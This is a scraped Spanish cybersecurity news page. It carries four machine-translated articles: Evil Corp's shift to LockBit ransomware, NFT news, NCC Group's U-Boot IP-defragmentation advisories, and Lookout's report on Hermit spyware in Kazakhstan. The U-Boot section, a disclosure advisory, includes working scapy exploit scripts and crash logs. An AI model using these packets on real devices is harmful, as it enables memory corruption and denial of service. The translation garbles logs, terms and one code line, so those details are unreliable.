Connect with us
https://cybersecuritynews.site/wp-content/uploads/2021/11/zox-leader.png

Published

on

The Ultimate Managed Hosting Platform

El grupo de amenazas denominado UNC2165, que comparte bastantes superposiciones con un grupo de ciberdelincuencia con sede en Rusia conocido como Evil Corp, se ha relacionado con una serie de intrusiones de ransomware LockBit en un intento de evitarlo. sanciones impuesto por el Tesoro de los Estados Unidos en diciembre de 2019.

“Estos actores se han alejado de utilizar variantes de ransomware únicas para LockBit, un conocido ransomware como servicio (RaaS), de sus operaciones, propensos a obstaculizar los esfuerzos de atribución con el fin de evadir sanciones”, amenaza la agencia de inteligencia Mandiant. señalado en una última semana de evaluación.

Activo desde 2019, se cree que UNC2165 obtiene acceso preliminar a las redes de los usuarios a través de credenciales robadas y un software malicioso de descarga basado en JavaScript llamado Actualizaciones falsas (también conocido como SocGholish), aprovechándolo para implementar de antemano infierno Secuestro de datos.

Hades es el trabajo de un grupo de piratas informáticos con motivación financiera llamado Evil Corp, al que también se puede hacer referencia con los apodos Gold Drake e Indrik Spider y se ha atribuido al notorio Dridex (también conocido como Bugat), además de otras cepas de ransomware como BitPaymer, DoppelPaymer y WastedLocker durante los últimos cinco años.

Se afirma que el giro de UNC2165 de Hades a LockBit como táctica para eludir sanciones ocurrió a principios de 2021.

Curiosamente, FakeUpdates también ha servido, hasta ahora, como vector de infección inicial para distribuir Dridex que luego se utilizó como conducto para colocar BitPaymer y DoppelPaymer en métodos comprometidos.

Mandiant mencionó similitudes adicionales destacadas entre UNC2165 y un ejercicio de ciberespionaje conectado a Evil Corp rastreado por la agencia suiza de ciberseguridad PRODAFT debajo del título. Lepisma dirigido a entidades gubernamentales y empresas Fortune 500 dentro de la UE y los EE. UU.

Se adopta un compromiso preliminar rentable mediante una serie de acciones como parte del ciclo de vida del ataque, que incluye la escalada de privilegios, el reconocimiento interno, el movimiento lateral y el mantenimiento de la entrada remota a largo plazo, antes de entregar las cargas útiles de ransomware.

Con las sanciones utilizadas como una forma de controlar los ataques de ransomware, a su vez, prohibir a las víctimas negociar con los atacantes, agregar un grupo de ransomware a una lista de sanciones, sin nombrar a las personas detrás de él, también ha sido difícil por el hecho de que los sindicatos ciberdelincuentes Por lo general, tienden a cerrar, reagrupar y cambiar la marca bajo un título especial para eludir la aplicación de la ley.

La seguridad cibernética

“La adopción de un ransomware actual es una evolución pura de UNC2165 para tratar de ocultar su afiliación con Evil Corp”, dijo Mandiant, al tiempo que aseguró que las sanciones “no son un factor limitante para recibir fondos de las víctimas”.

“Usar este RaaS permitiría que UNC2165 se mezcle con otros socios, agregó la compañía, y dijo: “Es probable que los actores detrás de las operaciones de UNC2165 continúen tomando medidas adicionales para distanciarse del título de Evil Corp”.

Los hallazgos de Mandiant, que está dentro de la estrategia de ser adquirido por Googleson particularmente importantes porque la pandilla de ransomware LockBit ha alegado desde entonces que había violado la comunidad de la empresa y robado información delicada.

El grupo, más allá de amenazar con lanzar “toda la información disponible” en su portal de fuga de información, no especificó la naturaleza exacta del contenido de esta información. Sin embargo, Mandiant dijo que no existe tal cosa como una prueba para ayudar a declarar.

“Mandiant ha revisado la información divulgada en el lanzamiento preliminar de LockBit”, dijo la compañía a The Hacker News. “Principalmente en base a la información que se ha publicado, no hay indicios de que se hayan revelado los datos de Mandiant por muy poco que el actor parezca estar tratando de refutar la investigación de Mandiant del 2 de junio de 2022 sobre UNC2165 y LockBit”.


[ad_2]
Source link

Continue Reading

Ultimas noticias

El proveedor de liquidez de Ethereum XCarnival negocia la devolución del 50% de ETH robado – Lo último en noticias de seguridad cibernética | Actualizaciones de ataques de malware

Published

on

Ethereum liquidity provider XCarnival negotiates return of 50% stolen ETH

The Ultimate Managed Hosting Platform

Noah Davis, el token no fungible (NFT) El especialista de la casa de venta pública Christie’s ha dicho que dejará el lugar en julio para participar como líder modelo de la colección CryptoPunks NFT con Yuga Labs.

anunciando el movimiento el domingo en un hilo de Twitter, Davis pareció sofocar cualquier inquietud que tuvieran los propietarios sobre el futuro de una de las iniciativas NFT más antiguas, diciendo que “no joderá con los punks”.

Invitó a los dueños de casas de CryptoPunk a programar una conversación con él sobre el futuro del desafío en el Evento NFT NYC y dijo que el nuevo lugar no le quitaría nada a su desafío personal de NFT.

Davis es responsable de la venta pública sin precedentes de Everydays: The First 5000 Days NFT de Beeple, que vendido por más de $ 69 millones en marzo de 2021.

laboratorios de yuga adquirió la propiedad intelectual de la colección CryptoPunks de Larva Labs en marzo, diciendo que entregará todos los derechos de propiedad intelectual a los propietarios, una promesa que aún no se ha cumplido.

Sin embargo, el cofundador de Yuga Labs Wylie Aronow alias Gargamel abordó el atraco en una colección de tweets el domingo, escritura era “demasiado importante para apurarse” y que las nuevas palabras “aparecerán en las próximas semanas”.

Con el anuncio de la transferencia de Davis y las nuevas palabras listas para tener impacto pronto, algunas son alegando que los iniciados tenían información previa del conocimiento, citando el creciente volumen de ventas de la reunión.

De acuerdo a Hasta OpenSea, se han producido 39 ventas brutas de la colección CryptoPunks desde el anuncio, con 101 ventas brutas en total el domingo, frente a las 19 ofrecidas el día anterior, el sábado.

Estafadora convicta se “reinventa” a sí misma con NFT

La estafadora y estafadora condenada Anna Sorokin, quien de 2013 a 2017 se hizo pasar por la rica heredera alemana “Anna Delvey” para estafar a conocidos y empresas por más de $ 275,000, comenzó una colección de NFT.

Titulada Reinventing Anna, la colección ofrece 2000 NFT por 0,1 Ether (ETH) cada, o alrededor de $ 110 en el momento de la escritura. Es comercializado como una manera para que los “seguidores trabajen con Anna” y la entrada personal “pregúntame-cualquier cosa” con Sorokin.

Asociado: El volumen de negociación de NFT aumenta en medio de la caída del mercado y el precio mínimo

La reunión contará con 20 “cartas de la versión dorada”, que otorgan a los propietarios la posibilidad de una llamada telefónica individual o una visita en persona con la llamada “famend socialite”.

El nombre de la reunión es un juego de inventando a ana La miniserie dramática de Netflix se lanzó a principios de este año, cuyo tema está basado en la historia de Sorokin.

“Veo esta primera caída como una oportunidad para unirme directamente a mi audiencia y tomar el control de la narrativa que ha estado en gran medida fuera de mi gestión”, escribió Sorokin en una publicación de Instagram sobre la reunión.

Sin embargo, se desconoce cómo los titulares de NFT podrán acudir a ella en persona. Desde marzo de 2021, Sorokin ha estado retenida por el Servicio de Inmigración y Control de Aduanas de los Estados Unidos por quedarse más tiempo que su visa y se enfrenta a la deportación a Alemania.

Seguidores de Duppies enfocados en estafa de phishing

Duppies, un próximo Proyecto Solana NFT del mismo equipo que la serie favorita de “DeGods”, su cuenta de Twitter fue pirateada el sábado, con atacantes tuiteando un hipervínculo a una “menta sigilosa” de los NFT.

El hipervínculo era un sitio web de phishing, y a los clientes que conectaron sus billeteras y trataron de acuñar se les vaciaron todos los fondos de sus billeteras. Un consumidor de Twitter escribió extraviaron 650 Solana (SOL), valorado en alrededor de $18.850, por el asalto.

En las áreas de Twitter después del ataque, el creador de la próxima colección llamado Frank se unió al auditor de seguridad Code Monkey para explique cómo ocurrió el asalto.

El auditor dijo que el atacante probablemente accedió a la cuenta de Twitter de los Duppies en un ataque de intercambio de SIM dirigido.

El ataque funciona cuando los estafadores se ponen en contacto con el proveedor de telefonía móvil del titular del número de teléfono y engañan al proveedor para que intercambie el número de teléfono por una tarjeta SIM de su propiedad. A partir de ahí, el atacante puede eludir cualquier autenticación de dos factores en la cuenta y lograr la entrada.

Información extra ingeniosa

El relojero TAG Heuer ha lanzado un reloj que puede emparejarse con un teléfono inteligente para mostrar NFT en la esfera del reloj y también conéctese con la cadena de bloques para confirmar que el NFT es propiedad del usuario.

A pesar de las advertencias de las autoridades del país, la variedad de NFT y plataformas digitales coleccionables en China ha visto un aumento de cinco veces desde febrero de 2022, pasando de poco más de 100 a más de 500, según medios estatales locales.



The Ultimate Managed Hosting Platform

Source link

Continue Reading

Ultimas noticias

Descubrimiento de 56 fallas de dispositivos OT atribuidas a una cultura de seguridad mediocre: lo último en noticias de seguridad cibernética | Actualizaciones de ataques de malware

Published

on

bug bounty

The Ultimate Managed Hosting Platform

Por Nicolás Bidron y Nicolás Guigo.

[Editor’s note: This is an updated/expanded version of these advisories which we originally published on June 3 2022.]

U-bota es un cargador de arranque popular para sistemas integrados con implementaciones para muchas arquitecturas y destacado en la mayoría de los sistemas integrados basados ​​en Linux como ChromeOS y Android Gadgets.

Se descubrieron dos vulnerabilidades en el algoritmo de desfragmentación de IP realizado en U-Boot, con enlaces a los avisos técnicos relacionados a continuación:

Las pruebas de explotación de ideas y resultados se ofrecen en todos los avisos técnicos a continuación.

Proyecto arranque en U
URL del proyecto https://source.denx.de/u-boot/u-boot
Variaciones afectadas todas las variaciones hasta cometer b85d130ea0cac152c21ec38ac9417b31d41b5552
Técnicas afectadas Todas las técnicas que definen CONFIG_IP_DEFRAG
identificador CVE CVE-2022-30790
URL de asesoramiento Enlace
Amenaza Vital 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Autores Nicolás Guigo, Nicolás Bidron

Resumen

U-boot es un cargador de arranque popular para sistemas integrados con implementaciones para una gran cantidad de arquitecturas y prominente en la mayoría de los sistemas integrados basados ​​en Linux.

Ubicación

En u-boot/net/net.c la __net_defragment línea de función 900 a 1018.

Impacto

La implementación U-Boot de RFC815 Los ALGORITMOS DE REENSAMBLAJE DE DATOS DE IP son propensos a un ataque de sobrescritura de Gap Descriptor que al final resulta en una primitiva de escritura arbitraria.

Descripción

En versiones compiladas de U-Boot que definen CONFIG_IP_DEFRAG, un valor de ip->ip_len (Longitud total del encabezado del paquete IP) superior a IP_HDR_SIZE y estrictamente inferior a IP_HDR_SIZE+8 conduce a un valor de len comprendido entre 0 y 7. Esto finalmente resulta en una división truncada por 8 dando como resultado un valor de 0, obligando a que los metadatos y el fragmento del agujero apunten a la misma ubicación. El memcpy posterior sobrescribe los metadatos del agujero con los datos del fragmento. A través de un segundo fragmento, estos metadatos controlados por el atacante pueden explotarse para realizar una escritura controlada en un desplazamiento arbitrario.

Este error solo se puede explotar desde la red local, ya que requiere la elaboración de un paquete con formato incorrecto que probablemente se descartaría durante el enrutamiento. Sin embargo, esto se puede aprovechar de manera efectiva para rootear localmente los dispositivos integrados basados ​​en Linux.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct hole *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, start, len, done = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload starts after IP header, this fragment is in there */
	payload = (struct hole *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	start = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

La última línea del extracto anterior de u-boot/net/net.c muestra cómo el atacante puede controlar el valor de len ser estrictamente inferior a 8 emitiendo un paquete con ip_len Entre 21 y 27 (IP_HDR_SIZE tiene un valor de 20).

También tenga en cuenta que offset8 aquí está 0 lo que lleva a thisfrag = payload.

	} else if (h >= thisfrag) {
		/* overlaps with initial part of the hole: move this hole */
		newh = thisfrag + (len / 8);
		*newh = *h;
		h = newh;
		if (h->next_hole)
			payload[h->next_hole].prev_hole = (h - payload);
		if (h->prev_hole)
			payload[h->prev_hole].next_hole = (h - payload);
		else
			first_hole = (h - payload);

	} else {

Más tarde, en la misma función, la ejecución llega a la ruta del código anterior. Aquí, len / 8 evalúa a 0 llevando a newh = thisfrag. También tenga en cuenta que first_hole aquí está 0 ya que h y payload apuntar al mismo lugar.

	/* finally copy this fragment and possibly return whole packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

En el extracto anterior la llamada a memcpy() sobrescribe los metadatos del agujero (ya que thisfrag y h ambos apuntan a la misma ubicación) con datos arbitrarios de los datos del paquete IP fragmentado. Con un len valor de 6, last_byte, next_holey prev_hole del first_hole todos terminan controlados por el atacante.

Finalmente, la escritura arbitraria se activa mediante el envío de un segundo paquete de fragmentos, cuyo desplazamiento y longitud solo necesitan encajar dentro del agujero al que apuntan los metadatos previamente controlados (next_hole) establecido desde el primer paquete.

Recomendación

Este error se corrigió en la confirmación b85d130ea0cac152c21ec38ac9417b31d41b5552 en la rama maestra de U-Boot. Actualice a la última versión para obtener la solución.

Prueba de Concepto de Explotación y Resultados

Se intentó explotar una compilación de U-Boot para Raspberry Pi 4 con IP_DEFRAG activado. El dispositivo se configuró para intentar cargar el kernel a través de U-Boot dhcp método, esto asegura que los dispositivos obtengan una dirección IP y habiliten su interfaz ethernet, lo que permite que una máquina adyacente en la red (conectada al mismo conmutador) entregue la carga útil maliciosa.

Se utilizó el siguiente script de Python para enviar el primer paquete malicioso que sobrescribirá el paquete inicial. __net_defragment() metadatos de agujero con contenido de una estructura de agujero especialmente diseñada. El segundo paquete ejecutó efectivamente la sobrescritura de memoria en el desplazamiento establecido por el primer paquete. next_holelo que provocó un bloqueo, pero la carga útil se puede ajustar para lograr escrituras de memoria controladas contra el objetivo.

import ctypes
from sys import argv
from scapy.all import *

# struct endianness based on arch
class hole(ctypes.LittleEndianStructure):
  _pack_ = 1
  _fields_ = [('last_byte', ctypes.c_ushort),
              ('next_hole', ctypes.c_ushort),
              ('prev_hole', ctypes.c_ushort),
              ('unused', ctypes.c_ushort)]
  def __init__(self, lb, nh, ph):
    return super().__init__(lb, nh, ph, 0xFEFE)

# U-Boot IP Fragment Hole Overwrite
def frag_hole_overwrite():
  # Prepare the malicious hole
  hh = hole(0x10, 0x07FD, 0xFFFF)
  payload = bytes(hh) + bytes(0x20)
  packet1 = Ether(dst=mac)/IP(dst=ip, flags="MF", frag=0x0, len=27)/Raw(payload)
  packet1.show2()
  sendp(packet1, iface="virbr0")
  # Trigger the unsafe write in the overlap case
  payload = bytes(0x10)
  packet2 = Ether(dst=mac)/IP(dst=ip, flags="MF", frag=0x0)/Raw(payload)
  packet2.show2()
  sendp(packet2, iface="eth0") iface=virbr0 if launched against a qemu instance

if __name__ == '__main__':
  global mac, ip
  mac = argv[1]
  ip = argv[2]
  frag_hole_overwrite()

El script anterior se puede iniciar con el siguiente comando:

> ./fragger_poc.py dc:a6:32:ef:5f:0a 192.168.0.90

Esto dará como resultado lo siguiente (registro como se muestra en la consola de U-Boot):

U-Boot 2022.04-dirty (May 26 2022 - 00:53:40 -0700)

DRAM:  7.1 GiB
RPI 4 Model B (0xd03114)
Core:  202 devices, 13 uclasses, devicetree: board
MMC:   [email protected]: 1, [email protected]: 0
Loading Setting from FAT... Unable to learn "uboot.env" from mmc0:1... 
In:    serial
Out:   vidconsole
Err:   vidconsole
Internet:   eth0: [email protected]
PCIe BRCM: hyperlink up, 5.0 Gbps x1 (SSC)
beginning USB...
Bus xhci_pci: Register 5000420 NbrPorts 5
Beginning the controller
USB XHCI 1.00
scanning bus xhci_pci for gadgets... 2 USB Gadget(s) discovered
       scanning usb for storage gadgets... 0 Storage Gadget(s) discovered
Hit any key to cease autoboot:  0 
change to partitions #0, OK
mmc0 is present machine
Scanning mmc 0:1...
Discovered U-Boot script /boot.scr
146 bytes learn in 9 ms (15.6 KiB/s)
## Executing script at 02400000
[email protected] Ready for PHY auto negotiation to finish. performed
BOOTP broadcast 1
DHCP consumer sure to deal with 192.168.0.90 (23 ms)
*** Warning: no boot file identify; utilizing 'C0A8005A.img'
Utilizing [email protected] machine
TFTP from server 192.168.0.1; our IP deal with is 192.168.0.90
Filename 'C0A8005A.img'.
Load deal with: 0x1000000
Loading: T T T T T T T T "Synchronous Abort" handler, esr 0x8a000000
elr: fffffffff8165fff lr : 00000000000e43a8 (reloc)
elr: 000000000000ffff lr : 0000000007f8e3a8
x0 : 0000000007b9b942 x1 : 000000000000007a
x2 : 0000000000000040 x3 : 000000000000ffff
x4 : 00000000000001ad x5 : 0000000007b2f000
x6 : 0000000000000024 x7 : 0000000000000000
x8 : 000000000000000b x9 : 0000000000000008
x10: 00000000ffffffe0 x11: 0000000000000006
x12: 000000000001869f x13: 0000000007b168cc
x14: 0000000007b18b00 x15: 0000000000000002
x16: 000000000000ffff x17: 2e8324b208000000
x18: 0000000007b25d60 x19: 000000000000007a
x20: 0000000007b2f130 x21: 0000000000000020
x22: 0000000007fcf000 x23: 0000000007fc9000
x24: 0000000007fcb000 x25: 0000000007fc9000
x26: 0000000007fc9628 x27: 0000000007fcf000
x28: 0000000007fcf000 x29: 0000000007b16b40

Code: 4bcbc7cb 46890822 c96a480a b2353b57 (3e972802) 
Resetting CPU ...

resetting ...
Proyecto arranque en U
URL del proyecto https://source.denx.de/u-boot/u-boot
Variaciones afectadas todas las variaciones hasta cometer b85d130ea0cac152c21ec38ac9417b31d41b5552
Técnicas afectadas Todas las técnicas que definen CONFIG_IP_DEFRAG
identificador CVE CVE-2022-30552
URL de asesoramiento Enlace
Amenaza Excesivo 7.1 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
Autores Nicolás Guigo, Nicolás Bidron

Resumen

U-boot es un cargador de arranque popular para sistemas integrados con implementaciones para una gran cantidad de arquitecturas y prominente en la mayoría de los sistemas integrados basados ​​en Linux.

Ubicación

u-boot/net/net.c líneas 915 y 1011.

Impacto

La implementación U-Boot de RFC815 Los ALGORITMOS DE REENSAMBLAJE DE DATOS DE IP son propensos a un desbordamiento de búfer por un datagrama de IP fragmentado diseñado específicamente con un tamaño completo no válido que provoca una denegación de servicio.

Descripción

En versiones compiladas de U-Boot que definen CONFIG_IP_DEFRAG, un valor de ip->ip_len (longitud total del encabezado del paquete IP) inferior a IP_HDR_SIZE lleva a len tomando un valor negativo, lo que finalmente da como resultado un desbordamiento de búfer durante la llamada posterior a memcpy() que usa len como su count parámetro.

Este error solo se puede explotar desde la red local, ya que requiere la elaboración de un paquete con formato incorrecto con un ip_len valor inferior a la longitud total mínima aceptada (21 según se define en el documento de especificación IP: RFC791) que probablemente podría descartarse durante el enrutamiento.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct gap *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, begin, len, performed = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload begins after IP header, this fragment is in there */
	payload = (struct gap *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	begin = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

La línea final del extracto anterior de u-boot/internet/internet.c muestra el lugar donde el desbordamiento a un adverso len vale la pena si ip_len está dispuesto a un precio estrictamente inferior a 20 (IP_HDR_SIZE siendo 20). Además, diga que dentro del extracto anterior el pkt_buff tampón tiene una medida de CONFIG_NET_MAXDEFRAG que tiene un valor predeterminado de 16 KB; sin embargo, puede variar de 1 KB a 64 KB dependiendo de las configuraciones.

	/* lastly copy this fragment and probably return entire packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

Dentro del extracto anterior el memcpy() desborda el lugar de vacaciones intentando hacer una réplica de prácticamente 4 gigas en un búfer diseñado para llevar CONFIG_NET_MAXDEFRAG bytes como máximo, lo que resulta en un DoS.

Recomendación

Este error se corrigió en la confirmación b85d130ea0cac152c21ec38ac9417b31d41b5552 en la rama maestra de U-Boot. Actualice a la última versión para obtener la solución.

Prueba de Concepto de Explotación y Resultados

Se intentó explotar una compilación de U-Boot para Raspberry Pi 4 con IP_DEFRAG activado. El dispositivo se configuró para intentar cargar el kernel a través de U-Boot dhcp método, esto asegura que los dispositivos obtengan una dirección IP y habiliten su interfaz ethernet, lo que permite que una máquina adyacente en la red (conectada al mismo conmutador) entregue la carga útil maliciosa.

El siguiente script de Python se usa para enviar el único paquete malicioso que se desbordará lenfinalmente desbordando el búfer (thisfrag) y bloquear el dispositivo.

import ctypes
from sys import argv
from scapy.all import *

# U-Boot Fragment Underflow
def frag_underflow():
  packet = Ether(dst=mac)/IP(dst=ip, flags="MF", frag=0x0, len=19)/UDP()
  packet.show2()
  sendp(packet, iface="eth0") # iface=virbr0 if launched against a qemu instance

if __name__ == '__main__':
  global mac, ip
  mac = argv[1]
  ip = argv[2]
  frag_underflow()

El script anterior se puede iniciar con el siguiente comando:

> ./fragger_poc.py dc:a6:32:ef:5f:0a 192.168.0.90

Esto dará como resultado lo siguiente (registro como se muestra en la consola de U-Boot):

U-Boot 2022.04-dirty (May 26 2022 - 00:53:40 -0700)

DRAM:  7.1 GiB
RPI 4 Model B (0xd03114)
Core:  202 devices, 13 uclasses, devicetree: board
MMC:   [email protected]: 1, [email protected]: 0
Loading Setting from FAT... Unable to learn "uboot.env" from mmc0:1... 
In:    serial
Out:   vidconsole
Err:   vidconsole
Internet:   eth0: [email protected]
PCIe BRCM: hyperlink up, 5.0 Gbps x1 (SSC)
beginning USB...
Bus xhci_pci: Register 5000420 NbrPorts 5
Beginning the controller
USB XHCI 1.00
scanning bus xhci_pci for gadgets... 2 USB Gadget(s) discovered
       scanning usb for storage gadgets... 0 Storage Gadget(s) discovered
Hit any key to cease autoboot:  0 
change to partitions #0, OK
mmc0 is present machine
Scanning mmc 0:1...
Discovered U-Boot script /boot.scr
146 bytes learn in 9 ms (15.6 KiB/s)
## Executing script at 02400000
BOOTP broadcast 1
DHCP consumer sure to deal with 192.168.0.90 (18 ms)
*** Warning: no boot file identify; utilizing 'C0A8005A.img'
Utilizing [email protected] machine
TFTP from server 192.168.0.1; our IP deal with is 192.168.0.90
Filename 'C0A8005A.img'.
Load deal with: 0x1000000
Loading: T T T T T T T T T T 
Retry rely exceeded; beginning once more
SCRIPT FAILED: persevering with...
libfdt fdt_check_header(): FDT_ERR_BADMAGIC
MMC Gadget 2 not discovered
no mmc machine at slot 2

Gadget 0: unknown machine
BOOTP broadcast 1
DHCP consumer sure to deal with 192.168.0.90 (21 ms)
*** Warning: no boot file identify; utilizing 'C0A8005A.img'
Utilizing [email protected] machine
TFTP from server 192.168.0.1; our IP deal with is 192.168.0.90
Filename 'C0A8005A.img'.
Load deal with: 0x1000000
Loading: T T T T T T T T "Synchronous Abort" handler, esr 0x96000046
elr: 00000000000e06e8 lr : 00000000000e5174 (reloc)
elr: 0000000007f8a6e8 lr : 0000000007f8f174
x0 : 0000000007fcb51c x1 : 0000000007b75964
x2 : ffffffffffffffff x3 : 0000000000234ae4
x4 : 0000000007fcb51c x5 : 0000000000000000
x6 : 0000000000000000 x7 : 00000000ffffffff
x8 : 0000000000000000 x9 : 0000000000000008
x10: 00000000ffffffe0 x11: 0000000007fcb514
x12: 000000000001869f x13: 0000000007b17d4c
x14: 0000000007b18b00 x15: 0000000000000002
x16: 0000000007f5cc84 x17: 2e8324b208000000
x18: 0000000007b25d60 x19: 0000000007b75942
x20: 0000000007fcb500 x21: 0000000007fa0fd0
x22: 0000000007f98156 x23: 00000000ffffffff
x24: 0000000007fc9000 x25: 0000000000000000
x26: 0000000007fcb514 x27: 0000000007fcb51c
x28: 0000000007b75950 x29: 0000000007b17f30

Code: cb030004 cb030021 17fffff0 38636825 (38236885) 
Resetting CPU ...

resetting ...

18 de mayo de 2022: Correo electrónico inicial de NCC a los mantenedores de U-boot anunciando que se identificaron dos vulnerabilidades. Los mantenedores de U-Boot respondieron indicando que el proceso de divulgación se manejará públicamente a través de la lista de correo de U-Boot.

18 de mayo de 2022: NCC publicó un informe completo de las dos vulnerabilidades identificadas en la lista de correo pública de U-Boot.

25 de mayo de 2022: un mantenedor de U-Boot indicó en la lista de correo que implementará una solución a los dos hallazgos.

26 de mayo de 2022: Los mantenedores de U-Boot han propuesto un parche para corregir ambos CVE a través de la lista de correo.

31 de mayo de 2022: Los mantenedores de U-boot y NCC Group acuerdan publicar los avisos antes de la implementación del parche, dada la discusión pública basada en la lista de correo sobre la vulnerabilidad y las soluciones propuestas.

3 de junio de 2022: La corrección está comprometida con la rama maestra de U-Boot https://source.denx.de/u-boot/u-boot/-/commit/b85d130ea0cac152c21ec38ac9417b31d41b5552

Jennifer Fernick y Dave Goldsmith por su apoyo durante el proceso de divulgación.

Los mantenedores de U-Boot.

Autores

Nicolás Guigo y Nicolás Bidron

The Ultimate Managed Hosting Platform

Source link

Continue Reading

Ultimas noticias

Gobierno de Kazajstán Software espía usado contra manifestantes

Published

on

Kazakh Govt. Used Spyware Against Protesters

The Ultimate Managed Hosting Platform

Los investigadores descubrieron que una entidad del gobierno de Kazajstán desplegó sutiles programas publicitarios italianos dentro de sus fronteras.

Un agente del gobierno de Kazajstán ha estado utilizando adware de nivel empresarial contra objetivos domésticos, según el análisis de Lookout. publicado Semana final.

La entidad del gobierno federal utilizó la suplantación de identidad modelo para engañar a las víctimas para que descargaran el malware, denominado “Ermitaño”. Hermit es un sofisticado programa modular desarrollado por RCS Lab, una infame firma italiana que se especializa en vigilancia digital. Tiene la capacidad de realizar todo tipo de espionaje en el teléfono de un objetivo, no solo para obtener información, sino también para informar y realizar llamadas.

El momento de esta operación de espionaje tiene un significado adicional. En la primera semana de 2022, las protestas antigubernamentales se enfrentaron a represiones violentas en todo Kazajistán. En total murieron 227 personas y casi 10.000 fueron detenidas. 4 meses después es cuando los investigadores encontraron las muestras más nuevas de Ermitaño haciendo rondas.

la intrusión

¿Cómo se consigue un objetivo para obtener su propio adware?

En esta campaña, los perpetradores utilizan OPPO (Guangdong Oppo Cell Telecommunications Corp., Ltd), un fabricante chino de dispositivos móviles y dispositivos electrónicos, como estrategia para ganarse la confianza de sus objetivos. Según los investigadores, los corredores contratados en nombre del gobierno envían mensajes SMS que supuestamente provienen de OPPO, que es un enlace secuestrado maliciosamente a la página web oficial de soporte en idioma kazajo de la compañía: http[://]oppo-kz[.]ayuda al cliente[.]com. (En el momento de la publicación del informe, esa página de soporte se había desconectado). En algunos casos, los atacantes también se hacen pasar por Samsung y Vivo, según Lookout.

La intrusión requiere que la víctima abra el mensaje SMS y haga clic en el hipervínculo a la página web secuestrada. Mientras está cargado, el malware se descarga simultáneamente en el fondo de la máquina objetivo, luego se conecta a un servidor C2 alojado por un pequeño proveedor de servicios en Nur-Sultan, la capital del país.

Como escribió Paul Shunk, investigador de seguridad de Lookout, en un comunicado de prensa: “La combinación de la concentración de clientes que hablan kazajo y la ubicación del servidor C2 de backend es una indicación sólida de que la campaña de marketing está administrada por una entidad en Kazajstán. .” Si bien los investigadores de Lookout reconocieron esa entidad como perteneciente a las autoridades estatales, no le atribuyeron un funcionario o división específica de las autoridades.

el software malicioso

Hermit no es simplemente sutil, es totalmente personalizable.

Está construido de forma modular, lo que significa que sus dueños pueden usar o ignorar algunas de sus 25 partes identificadas, cada una de las cuales tiene una función única. También significa que la implementación de cualquier evento dado de Ermitaño probablemente sea diferente al próximo.

Entre estas muchas capacidades se encuentran la capacidad de transmitir audio, realizar y redirigir llamadas y adquirir datos en el teléfono inteligente de un paciente.

Luego hay capacidades adicionales de área de interés. Por ejemplo, desde que los investigadores mencionaron su informe, “el adware también intenta mantener la integridad de los datos de las ‘pruebas’ recopiladas mediante el envío de un código de autenticación de mensajes basado en hash (HMAC). Esto permite a los actores autenticar quién envió la información y garantizar que la información no cambie”. ¿Por qué llama tanto la atención? Como resultado de “utilizar esta metodología para la transmisión de conocimiento podría permitir la admisibilidad de la prueba recopilada”.

“La invención de Hermit proporciona otra pieza del rompecabezas a la imagen del mercado secreto de instrumentos de vigilancia de ‘intercepción legal’”, escribió Shunk. “Si puede haber un uso real de esta tecnología, definitivamente requiere una supervisión estricta y protecciones contra el abuso”.

La plataforma de hospedaje administrado definitiva

Enlace fuente

El cargo Gobierno de Kazajstán Software espía usado contra manifestantes apareció por primera vez en Lo último en noticias de seguridad cibernética | Actualizaciones de ataques de malware | Noticias de tecnología.

The Ultimate Managed Hosting Platform

Source link

Continue Reading
Advertisement

Trending